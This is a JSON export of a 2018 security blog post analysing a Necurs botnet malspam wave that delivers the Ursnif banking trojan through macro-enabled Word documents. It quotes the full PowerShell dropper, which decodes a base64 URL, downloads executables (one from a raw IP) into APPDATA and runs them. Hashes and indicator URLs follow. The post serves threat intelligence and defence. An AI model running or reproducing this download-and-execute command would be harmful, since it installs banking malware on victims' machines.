{"id":56,"date":"2018-07-11T13:42:08","date_gmt":"2018-07-11T12:42:08","guid":{"rendered":"http:\/\/fortgale.com\/news\/?p=56"},"modified":"2026-06-08T09:34:54","modified_gmt":"2026-06-08T09:34:54","slug":"necurs-botnet","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/necurs-botnet\/","title":{"rendered":"Necurs Botnet &amp; Banking Trojans"},"content":{"rendered":"<p style=\"text-align: justify\">The Cisco Talos Team shared their analysis of the latest Malspam wave distributed by the Necurs Botnet (<a href=\"https:\/\/blog.talosintelligence.com\/2018\/01\/the-many-tentacles-of-necurs-botnet.html\">link<\/a>).<\/p>\n<p style=\"text-align: justify\">Necurs is among the most active botnets globally, capable of generating massive volumes of spam. The malicious emails delivered by this campaign carry Ransomware and Banking Trojans \u2014 specifically <strong>Ursnif<\/strong>, <strong>Panda Banker<\/strong>, and <strong>Emotet<\/strong>.<\/p>\n<p style=\"text-align: justify\">Opening the malicious document and enabling its content (Macro execution) triggers the system compromise chain.<\/p>\n<p style=\"text-align: justify\">The following is a brief analysis of the <strong>Ursnif<\/strong> banking malware:<\/p>\n<p style=\"text-align: justify\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/07\/Screenshot-165-300x137.png\" alt=\"\" width=\"300\" height=\"137\" class=\"size-medium wp-image-58 alignleft\" style=\"font-size: 14px\" loading=\"lazy\" \/><br \/>\nThe malicious attachment is a <code>.doc<\/code> file named: <code>[COMPANYNAME]_Request - [Employee Surname].doc<\/code><\/p>\n<p style=\"text-align: justify\">Opening the file and enabling content launches a PowerShell command with the following parameters:<\/p>\n<blockquote><p>$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(&#8220;aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA\/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA=&#8221;));(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + &#8216;\\valabyhuh.exe&#8217;); Start-Process $env:APPDATA&#8217;\\valabyhuh.exe&#8217;;Write-Host &#8220;bAbYgiramOpEPY&#8221;;$iARAPUmOPaJeS = New-Object System.Net.NetworkCredential(&#8220;lUpIaaKAXuqexOGybu&#8221;,&#8221;lUpIaaKAXuqexOGybu&#8221;).SecurePassword;(New-Object System.Net.WebClient).DownloadFile(&#8216;http:\/\/91.210.104.247\/porn.jpg&#8217;, $env:APPDATA + &#8216;\\stat.exe&#8217;); Write-Host &#8220;FYFopIsYpUjurof&#8221;;Start-Process $env:APPDATA&#8217;\\stat.exe&#8217;;$jOCOdeFOLUXALoNA = &#8220;nuqoLuSAwEjOdE&#8221;,&#8221;iiQOCOhERiJYsyie&#8221;,&#8221;qIhyGAtYlebimycuaUf&#8221;,&#8221;bYtURYGunUtiKe&#8221;,&#8221;pazuWeXOQoFIzIQUaUhe&#8221;;Exit;<\/p><\/blockquote>\n<p style=\"text-align: justify\">The executed code initiates the download of two executable files:<\/p>\n<ul style=\"text-align: justify\">\n<li><code>valabyhuh.exe<\/code>\n<ul>\n<li>MD5: &nbsp;&nbsp;&nbsp;&nbsp;<code>fa37eb66b10eb030e777af9420ffce9a<\/code><\/li>\n<li>SHA1: &nbsp;&nbsp;<code>92b86fcdb6bc0fcdbb60478e41456d5b565410ce<\/code><\/li>\n<li>SHA256: <code>856e8c8716fa5afac747efcd8acfe1488c703f1b8620dd567b2b7543458c5d69<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul style=\"text-align: justify\">\n<li><code>stat.exe<\/code>\n<ul>\n<li>MD5: &nbsp;&nbsp;&nbsp;&nbsp;<code>2ca1f87a624245db0a57bf439b71d460<\/code><\/li>\n<li>SHA1: &nbsp;&nbsp;<code>2f6de1b66d8021b74ebcee0040b9a7c00b61d231<\/code><\/li>\n<li>SHA256: <code>06af68780ff670177daf0d6e34918976a46f9e69787a284b8757470fb02903b3<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify\">Network traffic generated:<\/p>\n<p style=\"text-align: justify\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/07\/Screenshot-166-300x35.png\" alt=\"\" width=\"771\" height=\"90\" class=\"alignnone wp-image-59\" style=\"font-size: 14px\" loading=\"lazy\" \/><\/p>\n<p style=\"text-align: justify\">Indicators of Compromise:<\/p>\n<ul style=\"text-align: justify\">\n<li><code>http:\/\/91.210.104.247\/emotet.txt<\/code> (GrandSoft EK related)<\/li>\n<li><code>http:\/\/45.227.252.241\/linnealva\/kitea.dlm<\/code><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>The Cisco Talos Team shared their analysis of the latest Malspam wave distributed by the Necurs Botnet (link). Necurs is among the most active botnets globally, capable of generating massive volumes of spam. The malicious emails delivered by this campaign carry Ransomware and Banking Trojans \u2014 specifically Ursnif, Panda Banker, and Emotet. Opening the malicious &#8230; <a title=\"Necurs Botnet &amp; Banking Trojans\" class=\"read-more\" href=\"https:\/\/fortgale.com\/blog\/emerging-threats\/necurs-botnet\/\" aria-label=\"Read more about Necurs Botnet &amp; Banking Trojans\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":61,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[48,125,161,242,362,368],"class_list":["post-56","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-banker","tag-emotet","tag-grandsoft","tag-necurs","tag-trojan","tag-ursnif"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/56","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=56"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/56\/revisions"}],"predecessor-version":[{"id":9811,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/56\/revisions\/9811"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=56"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=56"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=56"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}